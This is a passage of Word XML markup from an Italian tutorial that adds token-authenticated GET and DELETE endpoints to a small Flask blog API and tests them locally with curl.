        <w:t xml:space="preserve">"/api/messaggi/&lt;int:msg_id&gt;"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api_messaggi_singolo(msg_id):</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SELECT messaggi.id, messaggi.testo, utenti.username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM messaggi JOIN utenti ON messaggi.utente_id = utenti.id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE messaggi.id = ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (msg_id,))</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"messaggio non trovato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> jsonify({</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]})</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ── DELETE /api/messaggi/&lt;id&gt; ───────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/messaggi/&lt;int:msg_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"DELETE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> api_messaggi_cancella(msg_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utente_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente_da_token(request.headers.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Authorization"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utente_id:</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"token mancante o invalido"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">401</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utente_id FROM messaggi WHERE id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (msg_id,))</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"messaggio non trovato"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente_id:</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"non puoi cancellare i messaggi altrui"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"DELETE FROM messaggi WHERE id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (msg_id,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva il file.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Importante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cancella il vecchio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(così le tabelle vengono ricreate con la nuova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">token_api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm miniblog.db        # macOS / Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">del miniblog.db       # Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia l’app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python miniblog.py</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:id="172" w:name="step-3-testiamo-con-curl"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Testiamo con curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">secondo terminale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lascia il primo a far girare Flask). Su VS Code: clicca sul</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accanto al terminale per aprirne uno nuovo, o usa il menu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal → New Terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 1 — Recupera la lista messaggi (vuota all’inizio):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risposta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messaggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 2 — Login:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/login</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Content-Type: application/json" -d "{\"username\": \"mario\", \"password\": \"mario\"}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(su Linux/macOS puoi usare gli apici singoli per il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-d '{"username": "mario", "password": "mario"}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Su Windows con PowerShell, le virgolette interne vanno escapate come mostrato sopra.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risposta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"abc123XYZ_lungoEdAleatorio"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Copia il token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ti viene restituito. Lo userai nei prossimi comandi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 3 — Pubblica un messaggio (autenticato):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H "Content-Type: application/json" -H "Authorization: Bearer IL-TUO-TOKEN-QUI" -d "{\"testo\": \"Primo post via API!\"}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risposta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Primo post via API!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Status:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">201 Created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 4 — Verifica che il messaggio compare nella lista:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risposta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"messaggi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"autore"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Primo post via API!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E adesso apri anche il browser su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la versione HTML): vedrai lo stesso messaggio.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sito web e API condividono lo stesso database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: stessa applicazione, due interfacce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 5 — Tenta di cancellare un messaggio senza token (deve dare 401):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X DELETE </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi/1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo switch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mostra anche lo status code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 401 UNAUTHORIZED</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"errore":"token mancante o invalido"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Test 6 — Cancella il tuo messaggio (autenticato):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X DELETE </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
